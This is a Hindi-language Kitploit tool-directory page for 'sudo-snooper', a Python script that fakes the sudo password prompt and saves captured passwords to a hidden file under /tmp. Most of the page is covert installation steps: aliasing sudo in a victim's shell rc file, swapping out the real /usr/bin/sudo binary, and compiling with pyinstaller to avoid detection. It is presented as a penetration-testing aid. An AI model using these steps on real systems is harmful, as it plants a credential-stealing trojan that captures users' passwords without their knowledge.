Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
sudo-snooper — एक Python स्क्रिप्ट जो मूल sudo बाइनरी की तरह व्यवहार करती है ताकि उपयोगकर्ताओं को उनके पासवर्ड दर्ज करने के लिए मूर्ख बनाया जा सके। | Kitploit
उपकरण/GitHubGitHub/xorond/sudo-snooper
फ़िशिंग उपकरणपासवर्ड हमलेपेनिट्रेशन टेस्टिंगसामाजिक इंजीनियरिंग
GitHubxorond/sudo-snooper

sudo-snooper

एक Python स्क्रिप्ट जो मूल sudo बाइनरी की तरह व्यवहार करती है ताकि उपयोगकर्ताओं को उनके पासवर्ड दर्ज करने के लिए मूर्ख बनाया जा सके।

रिपॉजिटरी देखें
70346 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

sudo-snooper

sudo-snooper मूल sudo बाइनरी की तरह काम करता है ताकि उपयोगकर्ताओं को उनके पासवर्ड दर्ज करने के लिए बेवकूफ बनाया जा सके।

यह उपयोगकर्ता को अपना sudo पासवर्ड दर्ज करने के लिए मूल प्रॉम्प्ट जैसा एक नकली प्रॉम्प्ट दिखाएगा।

यह पेनिट्रेशन टेस्ट या सुरक्षा मूल्यांकन में उपयोगी हो सकता है ताकि उपयोगकर्ता के ज्ञान का परीक्षण किया जा सके।

स्थापना चरण

विकल्प 1 - sudo कमांड का उपनाम बनाएं (आसान लेकिन थोड़ा अधिक ध्यान देने योग्य)

यह विकल्प करना आसान और अधिक पोर्टेबल है, हालांकि सावधान उपयोगकर्ताओं को यह अधिक ध्यान देने योग्य हो सकता है।

उपयोगकर्ता द्वारा उपयोग किए जा रहे शेल की .rc फ़ाइल (.bashrc, .zshrc आदि) को संपादित करें और निम्नलिखित जोड़ें:

root@kitploit:~
alias sudo='python3 /path/to/sudo-snooper.py'

सुनिश्चित करें कि sudo-snooper.py में सही अनुमतियाँ हैं।

विकल्प 2 - वास्तविक sudo के स्थान पर स्थापित करें (कठिन लेकिन कम स्पष्ट)

इस स्थापना विकल्प के लिए आपको रूट एक्सेस की आवश्यकता है

यह तभी उपयोगी होता है जब आपके पास पहले से रूट एक्सेस हो लेकिन किसी कारणवश /etc/shadow से हैश क्रैक नहीं कर पा रहे हों। मूलतः आप उपयोगकर्ता से उनका पासवर्ड फिश कर सकते हैं।

  • मूल sudo बाइनरी को दूसरे नाम पर ले जाएं
root@kitploit:~
# mv /usr/bin/sudo /usr/bin/somename
  • फ़ाइल में पैरामीटर अपनी पसंद के अनुसार बदलें

sudo-snooper.py में ये बदलें:

root@kitploit:~
dumpdir = "/tmp/.snooper"
dumpfile = "/tmp/.snooper/dump.txt"
sudo = 'sudo'
  • python फ़ाइल को /usr/bin/sudo (या जहाँ sudo पहले था) में स्थापित करें
root@kitploit:~
# install -dm755 sudo-snooper.py /usr/bin/sudo
  • python फ़ाइल को आवश्यक अनुमतियाँ दें

    आप यहाँ फैंसी हो सकते हैं और उपयोगकर्ताओं के लिए एक गैर-पठनीय निष्पादन योग्य फ़ाइल बना सकते हैं, लेकिन मैं उसमें नहीं जा रहा हूँ। इसके लिए यहाँ दिए गए कुछ उत्तर देखें।

नोट: इसे स्थापित करने का थोड़ा अधिक विश्वसनीय तरीका pyinstaller का उपयोग करके इसे संकलित करना है ताकि जब file /usr/bin/sudo निष्पादित किया जाए तो यह python फ़ाइल के रूप में न दिखे।

Archlinux के तहत ऐसा करने के लिए: pyinstaller --onefile sudo-snooper.py काम करेगा। हालांकि कृपया ध्यान दें कि एक बार संकलित होने के बाद आप संकलित बाइनरी में पैरामीटर नहीं बदल पाएंगे।

उपयोग:

एक बार स्थापित होने के बाद, sudo-snooper को सामान्य sudo की तरह ही कॉल किया जा सकता है।

उदाहरण के लिए, निम्नलिखित चलाने पर

root@kitploit:~
sudo vim /etc/resolv.conf

sudo-snooper को कॉल किया जाएगा (यह मानते हुए कि यह ठीक से स्थापित है)।

यह उपयोगकर्ता पासवर्ड मांगेगा और फिर यदि पासवर्ड सही है तो वास्तविक sudo बाइनरी पर रीडायरेक्ट करके कमांड निष्पादित करेगा।

इसके बाद आप सेटिंग्स में डंप फ़ाइल को पढ़कर उपयोगकर्ता पासवर्ड प्राप्त कर सकते हैं।

TODO:

  • जब उपयोगकर्ता गलत पासवर्ड दर्ज करता है तो हैंडल करें
टूल डाउनलोड करें